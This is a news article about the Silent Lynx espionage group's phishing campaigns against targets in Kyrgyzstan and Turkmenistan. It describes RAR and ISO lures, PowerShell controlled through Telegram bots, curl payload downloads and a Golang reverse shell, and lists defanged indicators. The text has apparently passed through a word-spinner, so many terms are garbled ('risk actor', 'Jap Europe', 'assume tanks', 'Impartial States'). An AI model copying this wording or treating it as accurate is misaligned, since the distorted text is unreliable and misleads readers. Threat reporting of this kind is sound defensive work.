A beforehand undocumented risk actor often called Silent Lynx has been linked to cyber assaults focusing on varied entities in Kyrgyzstan and Turkmenistan.
“This risk group has beforehand focused entities round Jap Europe and Central Asian authorities assume tanks concerned in financial resolution making and banking sector,” Seqrite Labs researcher Subhajeet Singha mentioned in a technical report revealed late final month.
Targets of the hacking group’s assaults embrace embassies, attorneys, government-backed banks, and assume tanks. The exercise has been attributed to a Kazakhstan-origin risk actor with a medium degree of confidence.
The infections begin with a spear-phishing electronic mail containing a RAR archive attachment that in the end acts as a supply automobile for malicious payloads liable for granting distant entry to the compromised hosts.
The primary of the 2 campaigns, detected by the cybersecurity firm on December 27, 2024, leverages the RAR archive to launch an ISO file that, in flip, features a malicious C++ binary and a decoy PDF file. The executable subsequently proceeds to run a PowerShell script that makes use of Telegram bots (named “@south_korea145_bot” and “@south_afr_angl_bot”) for command execution and knowledge exfiltration.
Among the instructions executed by way of the bots embrace curl instructions to obtain and save extra payloads from a distant server (“pweobmxdlboi[.]com”) or Google Drive.
The opposite marketing campaign, in distinction, employs a malicious RAR archive containing two information: A decoy PDF and a Golang executable, the latter of which is designed to determine a reverse shell to an attacker-controlled server (“185.122.171[.]22:8082”).
Seqrite Labs mentioned it noticed some degree of tactical overlaps between the risk actor and YoroTrooper (aka SturgeonPhisher), which has been linked to assaults focusing on the Commonwealth of Impartial States (CIS) nations utilizing PowerShell and Golang instruments.
“Silent Lynx’s campaigns show a complicated multi-stage assault technique utilizing ISO information, C++ loaders, PowerShell scripts, and Golang implants,” Singha mentioned.
“Their reliance on Telegram bots for command and management, mixed with decoy paperwork and regional focusing on which additionally highlights their concentrate on espionage in Central Asia and SPECA primarily based nations.”
